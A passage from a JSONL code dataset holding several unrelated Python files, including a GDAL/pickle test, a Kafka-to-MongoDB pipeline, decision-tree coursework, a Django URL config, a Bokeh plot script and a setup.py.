dictionary using protocol 0.\npickle.dump(SigmaHHwnr, output)\n\n# Pickle the list using the highest protocol available.\npickle.dump(selfref_list, output, -1)\n\noutput.close()\n\n\nimport pickle\n\npkl_file = open('data.pkl', 'rb')\n\ndata1 = pickle.load(pkl_file)\ndata2 = pickle.load(pkl_file)\n\npkl_file.close()\n\nfrom osgeo import gdal\n\ndriver = gdal.GetDriverByName('GTiff')\noutput_dataset = driver.Create('sigma.tiff', \\\n calibPar.RasterXSize, calibPar.RasterYSize, 4, gdal.GDT_Float64)\noutput_dataset.SetGeoTransform(calibPar.geotransform)\noutput_dataset.SetGCPs(calibPar.gcps, calibPar.gcpproj)\noutput_dataset.GetRasterBand(1).WriteArray(calibPar.SigmaHHwnr, 0, 0)\noutput_dataset.GetRasterBand(2).WriteArray(calibPar.SigmaVVwnr, 0, 0)\noutput_dataset.GetRasterBand(3).WriteArray(calibPar.SigmaHVwnr, 0, 0)\noutput_dataset.GetRasterBand(4).WriteArray(calibPar.SigmaVHwnr, 0, 0)\noutput_dataset = None\n\nfid=gdal.Open('sigma.tiff',gdal.GA_ReadOnly)\nHH = fid.GetRasterBand(1).ReadAsArray()\nHV = fid.GetRasterBand(2).ReadAsArray()\nVH = fid.GetRasterBand(3).ReadAsArray()\nVV = fid.GetRasterBand(4).ReadAsArray()\nfid = None","sub_path":"drafts/pickleTest.py","file_name":"pickleTest.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"603166826","text":"import os\nimport json\n\nimport PyGnuplot as gp\n\nlabels = [('Mean Opinion Score', 'mean_opinion_score'),\n ('Frame Rate', 'frame_rate'),\n ('Consumed Profile', 'profile')]\nspectator_data = '{}/{}/transcoder_{}/spectators/{}/data/{}.txt'\n\nfor scenario_dir in next(os.walk('.'))[1]:\n for run in next(os.walk(scenario_dir))[1]:\n with open('{}/{}/{}.txt'.format(scenario_dir, run, run)) as collected_measurements:\n spectators_and_trans = dict()\n for line in collected_measurements:\n previous_measurements, action, after_measurements = json.loads(line)\n client_id = previous_measurements.pop('client_id')\n transcoder_no = previous_measurements.pop('transcoder_no')\n if (client_id, transcoder_no) in spectators_and_trans.keys():\n spectators_and_trans[(client_id, transcoder_no)]['mean_opinion_score'].extend(\n [previous_measurements['mean_opinion_score'], after_measurements['mean_opinion_score']])\n spectators_and_trans[(client_id, transcoder_no)]['frame_rate'].extend(\n [previous_measurements['framerate_on'], after_measurements['framerate_on']])\n spectators_and_trans[(client_id, transcoder_no)]['profile'].extend(\n [previous_measurements['quality'], after_measurements['quality']])\n else:\n spectators_and_trans.update({\n (client_id, transcoder_no): {\n 'mean_opinion_score': [previous_measurements['mean_opinion_score'],\n after_measurements['mean_opinion_score']],\n 'frame_rate': [previous_measurements['framerate_on'],\n after_measurements['framerate_on']],\n 'profile': [previous_measurements['quality'],\n after_measurements['quality']]\n }\n })\n for key in spectators_and_trans.keys():\n for metric in spectators_and_trans[key].keys():\n filename = spectator_data.format(scenario_dir, run, key[1], key[0], metric)\n if not os.path.exists(os.path.dirname(filename)):\n os.makedirs(os.path.dirname(filename))\n X = spectators_and_trans[key][metric]\n Y = list(range(0, len(spectators_and_trans[key][metric])))\n gp.s([Y, X], filename)\n","sub_path":"results/make_spectator_data.py","file_name":"make_spectator_data.py","file_ext":"py","file_size_in_byte":2577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} 
+{"seq_id":"404487810","text":"\"\"\"\r\nTitle : collections namedtuple.\r\nSubdomain : HackerRank/Python/Challenges/Collections\r\nDomain : Python\r\nAuthor : Sai Ram Adidela\r\nCreated : 16 May 2018\r\n\"\"\"\r\n# from __future__ import division\r\nfrom collections import namedtuple\r\nno = int(input())\r\ncolumns = ','.join(input().split())\r\n# print('intial columns: ', columns)\r\nstudent = namedtuple('student', columns)\r\nsum = 0\r\nfor i in range(no):\r\n line = input().split()\r\n stu = student(*line)\r\n # print('stu: ', stu)\r\n sum += int(stu.MARKS)\r\nprint(sum/no)\r\n","sub_path":"challenges/collections/collections.namedtuple.py","file_name":"collections.namedtuple.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"87945098","text":"\"\"\"\nB(E)3M33UI - Artificial Intelligence course, FEE CTU in Prague\nDecision trees and ensemble models\n\nPetr Posik, Jiri Spilka, CVUT, Praha 2018\n\"\"\"\n\nimport numpy as np\nfrom sklearn import metrics\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import AdaBoostClassifier, RandomForestClassifier\nfrom matplotlib import pyplot as plt\n\nfrom mpg import load_mpg_for_2D_classification\nfrom plotting import compute_validation_curve, plot_validation_curve, plot_2D_class_model, \\\n plot_xy_classified_data\n\ndef compute_validation_curve(model, param_name, param_range, Xtr, ytr, Xtst, ytst):\n train_errors = np.zeros(len(param_range))\n test_errors = np.zeros(len(param_range))\n\n for i,val in np.ndenumerate(param_range):\n test_this = {param_name:val}\n model.set_params(**test_this)\n model.fit(Xtr,ytr)\n\n yhat = model.predict(Xtr)\n train_errors[i] = 1 - metrics.accuracy_score(y_true=ytr,y_pred=yhat)\n\n yhat = model.predict(Xtst)\n test_errors[i] = 1 - metrics.accuracy_score(y_true=ytst, y_pred=yhat)\n\n return train_errors,test_errors\n\ndef main():\n\n # Load data\n X, y = load_mpg_for_2D_classification()\n # X, y = load_mpg_for_classification()\n\n print('\\nThe dataset (X and y) size:')\n print('X: ', X.shape)\n print('y: ', y.shape)\n print('sum(y = 0): ', sum(y == 0))\n print('sum(y = 1): ', sum(y == 1))\n\n # random_state=2017 - lets keep the training and test set the same\n Xtr, Xtst, ytr, ytst = train_test_split(X, y, test_size=0.2, random_state=2017)\n\n # FIXME Task 1: Decision Tree\n # raise NotImplementedError\n # \n m1 = DecisionTreeClassifier()\n param_name = 'max_depth'\n param_range = np.arange(1,100)\n parameters = {param_name: param_range}\n clf = GridSearchCV(m1,parameters)\n clf.fit(Xtr,ytr)\n\n print(\"Decision tree\")\n print(\"Best parameters: \", clf.best_params_)\n print(\"CV score: \", clf.best_score_)\n\n train_errors, test_errors = compute_validation_curve(m1, param_name, param_range, Xtr, ytr, Xtst, ytst)\n #plot_validation_curve(param_range, train_errors, test_errors)\n\n m1.set_params(**clf.best_params_)\n m1.fit(Xtr,ytr)\n # < USE TRAINING DATA ONLY >\n\n # FIXME Task 2: Adaboost\n # raise NotImplementedError\n # \n\n m2 = AdaBoostClassifier(base_estimator=DecisionTreeClassifier(max_depth=1))\n param_name = 'n_estimators'\n param_range = np.arange(1,10)\n parameters = {param_name: param_range}\n clf = GridSearchCV(m2, parameters)\n clf.fit(Xtr, ytr)\n\n print(\"\\nAdaBoost\")\n print(\"Best parameters: \", clf.best_params_)\n print(\"CV score: \", clf.best_score_)\n\n train_errors, test_errors = 
compute_validation_curve(m2, param_name, param_range, Xtr, ytr, Xtst, ytst)\n #plot_validation_curve(param_range, train_errors, test_errors)\n\n m2.set_params(**clf.best_params_)\n m2.fit(Xtr, ytr)\n\n # FIXME Task 3: Random Forest\n # raise NotImplementedError\n # \n\n m3 = RandomForestClassifier()\n param_name = ['n_estimators','max_depth']\n param_range = [np.arange(1, 10),np.arange(1, 10)]\n parameters = dict(zip(param_name,param_range))\n clf = GridSearchCV(m3, parameters)\n clf.fit(Xtr, ytr)\n\n print(\"\\nRandom forest\")\n print(\"Best parameters: \", clf.best_params_)\n print(\"CV score: \", clf.best_score_)\n\n for key in parameters.keys():\n train_errors, test_errors = compute_validation_curve(m3, key, parameters[key], Xtr, ytr, Xtst, ytst)\n #plot_validation_curve(parameters[key], train_errors, test_errors)\n\n m3.set_params(**clf.best_params_)\n m3.fit(Xtr, ytr)\n\n # FIXME Task 4-5: Classification performance on test set, decision boundary\n # raise NotImplementedError\n # \n # < USE TEST DATA FOR PREDICTIONS>\n plt.figure()\n plot_xy_classified_data(Xtst[:, 0], Xtst[:, 1], ytst, xlbl='x', ylbl='y')\n plot_2D_class_model(m1)\n plt.title(\"Decision tree\")\n\n plt.figure()\n plot_xy_classified_data(Xtst[:, 0], Xtst[:, 1], ytst, xlbl='x', ylbl='y')\n plot_2D_class_model(m2)\n plt.title(\"AdaBoost\")\n\n plt.figure()\n plot_xy_classified_data(Xtst[:, 0], Xtst[:, 1], ytst, xlbl='x', ylbl='y')\n plot_2D_class_model(m3)\n plt.title(\"Random Forest\")\n # prediction accuracy on test set\n print('Accuracy on test data:')\n print('Decision Tree: ', metrics.accuracy_score(ytst, m1.predict(Xtst)))\n print('Adaboost: ', metrics.accuracy_score(ytst, m2.predict(Xtst)))\n print('Random forest: ', metrics.accuracy_score(ytst, m3.predict(Xtst)))\n raise NotImplementedError\n# catch all exceptions\ntry:\n plt.ion() # turn interactive mode on so our plots stay open like in matlab\n main()\n\nexcept BaseException as e:\n import traceback\n traceback.print_exc() # mimic printing traceback from an exception\n plt.ioff() # turn interactive mode off\n plt.show() # show whatever we have to show, it will stay open because we turned interactive mode off\n\n","sub_path":"Week6/ML05-1.py","file_name":"ML05-1.py","file_ext":"py","file_size_in_byte":5079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"502286779","text":"from django.conf.urls import patterns, include, url\r\n#from django.contrib.staticfiles.url import staticfiles_urlpatterns\r\nfrom django.conf import settings\r\nfrom django.contrib import admin\r\n\r\nadmin.autodiscover()\r\n\r\nurlpatterns = patterns('',\r\n # Examples:\r\n url(r'^$', 'Inicio.views.index', name='Financeiro_index'),\r\n url(r'^config/', 'Inicio.views.config', name='Financeiro_config'),\r\n url(r'^conta/', 'Inicio.views.conta', name='Financeiro_conta'),\r\n url(r'^ajuda/', 'Inicio.views.ajuda', name='Financeiro_ajuda'),\r\n url(r'^admin/', include(admin.site.urls)),\r\n)\r\n","sub_path":"Financeiro/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"226962916","text":"import os\nimport sys\n\n\nimport ujson\nimport asyncio\nfrom kafka import KafkaConsumer\nfrom motor.motor_asyncio import AsyncIOMotorClient\n\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\nsys.path.append(basedir.replace(os.sep + 'pipline', ''))\nsys.path.append(basedir)\n\n\nfrom util.load_config import 
load_config\n\n\ndef add_to_mongo(config_name):\n config = load_config(basedir.replace(os.sep + 'pipline', '') + os.sep +\n os.sep.join(['configs', config_name]))\n MONGODB_SERVER = config['MONGO']['MONGODB_SERVER']\n MONGODB_PORT = int(config['MONGO']['MONGODB_PORT'])\n MONGODB_DB = config['MONGO']['MONGODB_DB']\n MONGODB_COLLECTION = config['MONGO']['MONGODB_COLLECTION']\n MONGODB_USER = config['MONGO']['MONGODB_USER']\n MONGODB_PASSWORD = config['MONGO']['MONGODB_PASSWORD']\n KAFKA_BOOTSTRAP_SERVERS = config['KAFKA']['KAFKA_BOOTSTRAP_SERVERS']\n KAFKA_DISCOVER_DETAIL_TOPIC = config['KAFKA']['KAFKA_TOPIC']\n KAFKA_GROUP = config['KAFKA']['KAFKA_GROUP']\n consumer = KafkaConsumer(KAFKA_DISCOVER_DETAIL_TOPIC, bootstrap_servers=KAFKA_BOOTSTRAP_SERVERS,\n auto_offset_reset='earliest', group_id=KAFKA_GROUP)\n client = AsyncIOMotorClient('mongodb://' + MONGODB_USER + ':' + MONGODB_PASSWORD + '@' + MONGODB_SERVER + ':'\n + str(MONGODB_PORT))\n db = client[MONGODB_DB]\n collection = db[MONGODB_COLLECTION]\n results = consumer\n for result in results:\n msg = result.value.decode()\n item = ujson.loads(msg)\n key = list(item.keys())[0]\n value = item[key]\n target = {\n 'keyword': str(key).strip(),\n 'info_resp': value\n }\n async def do_update():\n result = await collection.update_many(\n {'keyword': str(key).strip()},\n {'$set': target}, upsert=True)\n loop = asyncio.get_event_loop()\n loop.run_until_complete(do_update())\n\n\n\n","sub_path":"encircling-net/pipline/Discover_Detail_Pipline.py","file_name":"Discover_Detail_Pipline.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"363162429","text":"#! /usr/bin/env python\n\nimport random , numpy as np\nimport math\nimport cmath\nfrom shapely.geometry import Polygon, Point, LineString\nfrom descartes import PolygonPatch\nimport matplotlib.pyplot as plt\n\nPI = np.pi\nTHRESHOLD = 0.25 # 1/2 of bot length\nALPHA = 10 # Experimental in scan_obstacle_checker for optimization\nMIN_ANG = 0 # Starting angle at which the lidar starts\nMAX_ANG = 2*PI # Max angle of Lidar\nSHOW_ANIMATION = False\nEXPAND_DIS = 0.5\n\ndef make_obstacles_scan(scan_list):\n\t\"\"\"Make Line obstacles from Laserscan\n Args:\n scan_list: List of LaserScan ranges\n Return:\n (line_obstacles , pts) : (Making lines of scan obstacles , scan_list(r,theta) --> scan_list(x,y) )\n \"\"\"\n\n\tpt_ang = np.arange( MIN_ANG , MAX_ANG , (MAX_ANG - MIN_ANG)/len(scan_list) )\n\tpt_scan = np.array(scan_list)\n\tpts = []\n\tpt_x = np.multiply(pt_scan , np.cos(pt_ang))\n\tpt_y = np.multiply(pt_scan , np.sin(pt_ang))\n\n\tfor a,b in zip(pt_x,pt_y):\n\t\tpts.append((a,b))\n\n\tpt_scan_prev = np.append(pt_scan[1:],pt_scan[0])\n\t\n\tline_obst = abs(pt_scan_prev - pt_scan)>2*THRESHOLD\n\tind=(np.argwhere(line_obst==True)).reshape(-1)\n\t\n\tline_obstacles = []\n\t\n\tfor i in range(len(ind)-1):\n\t\tline = [ (pt[0] , pt[1]) for pt in pts[ind[i]+1 : ind[i+1]+1] ]\n\t\tline_obstacles.append(line)\n\n\tif SHOW_ANIMATION:\n\t\tplt.clf()\n\t\tfor i in range(len(line_obstacles)):\n\t\t\tplt.plot([x for (x, _) in line_obstacles[i]], [y for (_, y) in line_obstacles[i]],'k')\n\t\tplt.grid(True)\n\t\tplt.axis([-7,7,-7,7])\n\t\tplt.show()\n\t\n\treturn (line_obstacles , pts)\n\n\ndef adjustable_random_sampler(sample_area, goal, goal_sample_rate):\n \"\"\"Randomly sample point in area while sampling goal point \n at a specified rate.\n\n Args:\n sample_area: area to sample point in (min and max)\n goal: tuple 
containing goal point coordinates.\n goal_sample_rate: number between 0 and 1 specifying how often \n to sample the goal point.\n \n Return:\n Randomly selected point as a tuple.\n \"\"\"\n\n if random.random() > goal_sample_rate:\n return (random.uniform(sample_area[0], sample_area[1]), \n random.uniform(sample_area[0], sample_area[1]))\n else:\n return goal\n\n\ndef scan_obstacle_checker(scan_list , point):\n\t\"\"\"\n\tChecking Whether the sampled point lies beyond THRESHOLD distance of every point. Experimental\n\n\t\tArgs:\n\t\t\tscan_list --> List of scan \n\t\t\tpoint --> sampled point\n\n\t\tReturns --> ('nan','nan') if lies in obstacle else point\n\t\"\"\"\n\t#Point in polar coordinates (rho , phi)\n\tphi = math.atan2(point[1] , point[0])\n\t\n\trho = math.sqrt(point[0]**2 + point[1]**2)\n\n\t#enumerating the list \n\tscan_list_enum = np.arange( MIN_ANG , MAX_ANG , (MAX_ANG - MIN_ANG)/len(scan_list) )\n\n\tfor obstacle in zip(scan_list_enum , scan_list):\n\t\t# Checking the absolute of vector difference from each coordinate to be greater than THRESHOLD\n\t\tif abs( complex( cmath.rect(obstacle[1] , obstacle[0]) ) - complex( cmath.rect(rho , phi) ) ) < THRESHOLD:\n\t\t\treturn float('nan'),float('nan')\n\treturn point\n\n#############################################################\n##################EXPERIMENTAL###############################\n\t# Phi in degrees, used for indexing in LaserScan\n\t# phi_deg = int(math.floor(phi*180/PI))\n\n\t# try:\n\t# \tALPHA = int(math.ceil(math.asin(THRESHOLD/rho)))\n\t# except:\n\t# \tALPHA=10\n\t# \tprint(rho)\n\t# \t# return float('nan'),float('nan')\n\t# if (ALPHA<=phi_deg<=360 - ALPHA):\n\t# \tfor obstacle in scan_list_enum[phi_deg-ALPHA:phi_deg+ALPHA+1]:\n\t# \t\t# print(abs(complex(cmath.rect(obstacle[1],obstacle[0]) - complex(cmath.rect(rho,phi)))))\n\t# \t\tif abs(complex(cmath.rect(obstacle[1],obstacle[0]*PI/180) - complex(cmath.rect(rho,phi)))) 0:\n\t\t\t\tfor layer in env.model.layers:\n\t\t\t\t\tnum_layer += 1\n\t\t\t\t\tif num_layer > 10:\n\t\t\t\t\t\tlayer.trainable = True\n\t\t\tfor epoch in range(num_epoch_2):\n\t\t\t\tfor num_minibatch in range(x_train.shape[0]/batchsize):\n\t\t\t\t\t#print('shape',x_train)\n\t\t\t\t\tx_train_batch = x_train[num_minibatch*batchsize:min((num_minibatch+1)*batchsize,x_train.shape[0]),:]\n\n\t\t\t\t\t#w,p = env.predict(x_train_batch)\n\n\t\t\t\t\tloss_bf = 0\n\t\t\t\t\twhile True:\n\t\t\t\t\t\tcur_x = state\n\t\t\t\t\t\tx = cur_x if np.sum(cur_x) != 0 else np.zeros((1,dim_feature*dim_feature))#np.random.normal(0,0.1,(1,dim_feature*dim_feature))\n\t\t\t\t\t\tx = np.reshape(x, (1, dim_feature*dim_feature))\n\t\t\t\t\t\tprev_x = copy.deepcopy(cur_x)\n\n\t\t\t\t\t\tact_times += 1\n\n\t\t\t\t\t\t#if len(xx) != 0:\n\t\t\t\t \t\t#loss_bf = np.sum(env.return_loss(x_train_batch,xx,yy))\n\t\t\t\t\t\tloss_bf = np.sum(env.return_loss(x_train_batch,xx,yy))\n\t\t\t\t\t\t\n\n\t\t\t\t\t\t#print('x',x)\n\t\t\t\t\t\taction1, action2, action3, prob = rl.act(x, act_times, cur_x)\n\t\t\t\t\t\t#print('state',state)\n\t\t\t\t\t\t#print('a1',action1)\n\t\t\t\t\t\tflag = 0\n\t\t\t\t\t\tfflag = 0\n\t\t\t\t\t\tif action1>-1:\n\t\t\t\t\t\t\ti = 0\n\t\t\t\t\t\t\tif state[int(action1/dim_feature), action1%dim_feature] == 1 or state[action1%dim_feature, int(action1/dim_feature)] == 1 or int(action1/dim_feature) == action1%dim_feature:\n\t\t\t\t\t\t\t\tflag = 1\n\t\t\t\t\t\t\tif flag == 0 or (len(xx) == 0 and int(action1/dim_feature) != 
action1%dim_feature):\n\t\t\t\t\t\t\t\txx.append(int(action1/dim_feature))\n\t\t\t\t\t\t\t\tyy.append(action1%dim_feature)\n\t\t\t\t\t\t#print('connect',xx)\n\t\t\t\t\t\t#print('connect',yy)\n\t\t\t\t\t\n\t\t\t\t\t\tloss_af1 = np.sum(env.return_loss(x_train_batch,xx,yy))\n\t\t\t\t\t\treward1 = rate*(loss_bf-loss_af1)\n\t\t\t\t\t\t#reward1 = rate*(loss_bf-loss_af1)\n\n\t\t\t\t\t\tnum_delete = 0\n\n\t\t\t\t\t\t#print('a2',action2)\n\t\t\t\t\t\tif action2>-1:\n\t\t\t\t\t\t\tif state[int(action2/dim_feature), action2%dim_feature] == 1:\n\n\t\t\t\t\t\t\t\tfflag = 1\n\t\t\t\t\t\t\t\tfor i in range(len(xx)):\n\t\t\t\t\t\t\t\t\tif xx[i]==int(action2/dim_feature) and yy[i]==action2%dim_feature:\n\t\t\t\t\t\t\t\t\t\tdel xx[i]\n\t\t\t\t\t\t\t\t\t\tdel yy[i]\n\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t#print('delete',xx)\n\t\t\t\t\t\t#print('delete',yy)\n\t\t\t\t\t\t#print('len', len(xx), len(yy))\n\n\n\t\t\t\t\t\tloss_af2 = np.sum(env.return_loss(x_train_batch,xx,yy))\n\t\t\t\t\t\t#reward2 = rate*(loss_bf-loss_af2)\n\t\t\t\t\t\treward2 = rate*(loss_af1-loss_af2)\n\n\t\t\t\t\t\tprint('loss',loss_bf,loss_af1,loss_af2)\n\n\n\t\t\t\t\t\tmin_ambiguity = 0\n\t\t\t\t\t\tmin_index = -1\n\t\t\t\t\t\t#print('ll',probb.shape)\n\t\t\t\t\t\t#print('lenx',len(xx))\n\t\t\t\t\t\t#print('leny',len(yy))\n\t\t\t\t\t\tif len(xx)>max_connection and flag == 0:\n\t\t\t\t\t\t\tfor i in range(len(xx)-1):\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tmin_ambiguity = max(min_ambiguity, abs(np.mean(np.mean(prob,axis = 0),axis = 0)[yy[i]]-0.5))\n\t\t\t\t\t\t\t\tif min_ambiguity==abs(np.mean(np.mean(prob,axis = 0), axis = 0)[yy[i]]-0.5):\n\t\t\t\t\t\t\t\t\tmin_index = i\n\t\t\t\t\t\t\taction2 = xx[min_index]*dim_feature+yy[min_index]\n\t\t\t\t\t\t\tdel xx[min_index]\n\t\t\t\t\t\t\tdel yy[min_index]\n\n\t\t\t\t\t\tloss_af2 = np.sum(env.return_loss(x_train_batch,xx,yy))\n\t\t\t\t\t\treward2 = rate*(loss_bf-loss_af2)\n\n\t\t\t\t\t\tstate = np.zeros((dim_feature, dim_feature))\n\t\t\t\t\t\tif len(xx)>0:\n\t\t\t\t\t\t\tfor i in range(len(xx)):\n\t\t\t\t\t\t\t\tstate[xx[i],yy[i]] = 1\n\t\t\n\t\t\t\t\t\t'''\n\t\t\t\t\t\tif action1 > -1:\n\t\t\t\t\t\t\tstate[int(action1/dim_feature),action1%dim_feature] = 1\n\t\t\t\t\t\tif action2 > -1:\n\t\t\t\t\t\t\tstate[int(action2/dim_feature),action2%dim_feature] = 0\n\t\t\t\t\t\t'''\n\t\t\t\t\t\tif action3 == 1:\n\t\t\t\t\t\t\tdone = 1\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tdone = 0\n\t\t\t\t\t\t#print('reward1',reward1.shape)\n\t\t\t\t\t\t#print('reward2',reward2.shape)\n\t\t\t\t\t\tscore += reward1+reward2\n\t\t\t\t\t\trl.remember(x, action1, action2, prob, reward1, reward2)\n\t\t\t\t\t\tif done:\n\t\t\t\t\t\t\tepisode += 1\n\t\t\t\t\t\t\trl.train()\n\t\t\t\t\t\t\t#rl.connect_thr = min(0.8, rl.connect_thr+(len(xx)-5)*0.000001/num_epoch_1)\n\t\t\t\t\t\t\trl.remove_thr = 1.0/(dim_feature*dim_feature)\n\t\t\t\t\t\t\tact_times = 0\n\t\t\t\t\t\t\tprint('Episode: %d - Score: %f.' 
% (episode, score))\n\t\t\t\t\t\t\tscore = 0\n\t\t\t\t\t\t\tprev_x = None\n\t\t\t\t\t\t\t#if episode > 1 and episode % 10 == 0:\n\t\t\t\t\t\t\t\t#rl.save('pong.h5')\n\t\t\t\t\t\t\tbreak\n\t\t\t\tloss_bf = np.sum(env.return_loss(x_train,[],[]))\n\t\t\t\tloss_af = np.sum(env.return_loss(x_train,xx,yy))\n\t\t\t\tprint('final_reward', loss_bf-loss_af)\n\t\t\t\tfinalrewards.append(loss_bf-loss_af)\n\n\t\tprint('finalrewards',finalrewards)\n\t\tenv.save('USNet_Weight_raw_64.h5')\n\t\tprint('xx',xx,yy,alpha,beta)\n\t\t\n\n\t\twith open('xx.bin','wb') as xx_bin:\n\t\t\tpickle.dump(xx,xx_bin)\n\t\twith open('yy.bin','wb') as yy_bin:\n\t\t\tpickle.dump(yy,yy_bin)\n\n\t\tenv.model.compile(loss=env.TOLoss(xx,yy),optimizer=opt)\n\t\t\n\t\tenv.model.fit(x_train, x_train, batch_size=batchsize, epochs=num_epoch_1 )\n\t\t\n\t\tenv.save('USNet_Weight_64.h5')\n\n\t\tx_test = np.transpose(np.load('feat16_test.npy'))\n\n\t\t#x_test = (x_test+1)/2\n\n\n\t\tnum_post = [1]*dim_feature\n\t\tprob = np.zeros((x_train.shape[0], dim_feature))\n\t\tw = env.model.predict(x_train)\n\t\tfor j in range(dim_feature):\n\t\t\tprob[:,j] = w[:,j*dim_feature+j]\n\t\t\tfor i in range(len(xx)):\n\t\t\t\tif j == yy[i]:\n\t\t\t\t\tprob[:,yy[i]] += w[:,xx[i]*dim_feature+yy[i]]\n\t\t\t\t\tnum_post[yy[i]] += 1\n\t\t\tprob[:,j] /= num_post[j]\n\t\t\t\n\t\t\n\t\tprob_train = prob\n\n\n\t\tnum_post = [1]*dim_feature\n\t\tprob = np.zeros((x_test.shape[0],dim_feature))\n\t\tw = env.model.predict(x_test)\n\n\t\tfor j in range(dim_feature):\n\t\t\tprob[:,j] = w[:,j*dim_feature+j]\n\t\t\tfor i in range(len(xx)):\n\t\t\t\tif j == yy[i]:\n\t\t\t\t\tprob[:,yy[i]] += w[:,xx[i]*dim_feature+yy[i]]\n\t\t\t\t\tnum_post[yy[i]] += 1\n\t\t\tprob[:,j] /= num_post[j]\n\t\t\t\n\t\t\n\t\tprob_test = prob\n \n\t\ttrainName = 'J2J3_feat_train%d.mat' % turning\n\t\ttestName = 'J2J3_feat_test%d.mat' % turning\n\t\t\t \n\t\tsio.savemat(trainName, {'prob_train':prob_train})\n\t\tsio.savemat(testName, {'prob_test':prob_test})\n\t\tprint('test',prob_test)\n\t\tprint('alpha')\n","sub_path":"main_twostage_4096.py","file_name":"main_twostage_4096.py","file_ext":"py","file_size_in_byte":7183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"32413550","text":"from PIL import Image\nimport numpy\nimport csv\nimport os\n\t\npicArray = numpy.zeros([41995,2], dtype = object)\ndef convertImg(img,numb,result):\n\tWIDTH, HEIGHT = img.size\n\tvalue = [] \n\n\tdata = list(img.getdata()) # convert image data to a list of integers\n\tdata = [data[offset:offset+WIDTH] for offset in range(0, WIDTH*HEIGHT, WIDTH)]\n\n\n\tfor x in range(0,27):\n\t\tfor y in range(0,27): \n\t\t\tvalue.append(data[x][y])\n\tpicArray[numb][0] = value\n\tpicArray[numb][1] = result\n\n\t\n\n\n\nfor l in range(0,41995):\n\tif os.path.exists('img_'+str(l)+'.jpg'):\n\t\timag = Image.open('img_'+str(l)+'.jpg').convert('L')\n\t\tconvertImg(imag,l,0)\nnumpy.savetxt(\"array.csv\",picArray,fmt = \"%s\")\nf = open(\"array.csv\", 'r')\nfor row in f:\n\tprint(row)\n\n","sub_path":"trainingSet/0/import cPickle.py","file_name":"import cPickle.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"141257111","text":"from bokeh.plotting import figure\nfrom bokeh.io import output_file, show\nfrom bokeh.layouts import row, column, gridplot\nfrom bokeh.palettes import Dark2_5 as palette\nimport pickle\n\noutput_file('panning.html')\n\nwith 
open(r'C:\\Users\\Katja\\PythonCodingTraining\\DataVisualization\\data-viz\\bokeh\\iris.pickle', 'rb') as file:\n iris = pickle.load(file)\n\nsepal_length = iris['data'][:,0]\nsepal_width = iris['data'][:,1]\npetal_length = iris['data'][:,2]\npetal_width = iris['data'][:,3]\nclasses = iris['target']\n\n# separate data via class\nsetosa_sepal_length = sepal_length[classes == 0]\nsetosa_sepal_width = sepal_width[classes == 0]\nsetosa_petal_length = petal_length[classes == 0]\nsetosa_petal_width = petal_width[classes == 0]\nversicolor_sepal_length = sepal_length[classes == 1]\nversicolor_sepal_width = sepal_width[classes == 1]\nversicolor_petal_length = petal_length[classes == 1]\nversicolor_petal_width = petal_width[classes == 1]\nvirginica_sepal_length = sepal_length[classes == 2]\nvirginica_sepal_width = sepal_width[classes == 2]\nvirginica_petal_length = petal_length[classes == 2]\nvirginica_petal_width = petal_width[classes == 2]\n\n# Creating multiple plots by creating multiple figures and then telling the show function \n# how to arrange these figures\n\nfig1 = figure(x_axis_label = 'Sepal length (cm)', y_axis_label = 'Sepal width (cm)')\nfig1.circle(setosa_sepal_length, setosa_sepal_width, color = palette[0], legend_label= 'setosa')\nfig1.circle(versicolor_sepal_length, versicolor_sepal_width, color = palette[1], legend_label= 'versicolor')\nfig1.circle(virginica_sepal_length, virginica_sepal_width, color = palette[2], legend_label= 'virginica')\n\nfig3 = figure(x_axis_label = 'Sepal length (cm)', y_axis_label = 'Petal length (cm)', x_range = fig1.x_range)\nfig3.circle(setosa_sepal_length, setosa_petal_length, color = palette[0], legend_label= 'setosa')\nfig3.circle(versicolor_sepal_length, versicolor_petal_length, color = palette[1], legend_label= 'versicolor')\nfig3.circle(virginica_sepal_length, virginica_petal_length, color = palette[2], legend_label= 'virginica')\n\n\nshow(column(fig1, fig3))","sub_path":"bokeh_panning.py","file_name":"bokeh_panning.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"371984695","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# -*- mode: python -*-\nimport os\nimport sys\n\nfrom setuptools import setup, find_packages\n\n\n'''\n\nVERSION HISTORY\n\n0.0.1 - Primeira instalação\n0.0.2 - Registrando cobrança\n\n'''\n\n__version__ = '0.0.2'\n\n\nhere =os.path.abspath(os.path.dirname(__file__))\n\n# Get the long description from the README file\nwith open(os.path.join(here, 'README.rst')) as f:\n long_description = f.read()\n\nsetup(\n name = 'pyf2b',\n version = __version__,\n packages = find_packages(),\n script_name = 'setup.py',\n scripts = [],\n\n package_data = {\n \"base\": [\"VERSION\"],\n },\n classifiers=[\n # How mature is this project? Common values are\n # 3 - Alpha\n # 4 - Beta\n # 5 - Production/Stable\n 'Development Status :: 3 - Alpha',\n\n # Indicate who your project is intended for\n 'Intended Audience :: Developers',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n\n # Pick your license as you wish (should match \"license\" above)\n 'License :: OSI Approved :: MIT License',\n\n # Specify the Python versions you support here. 
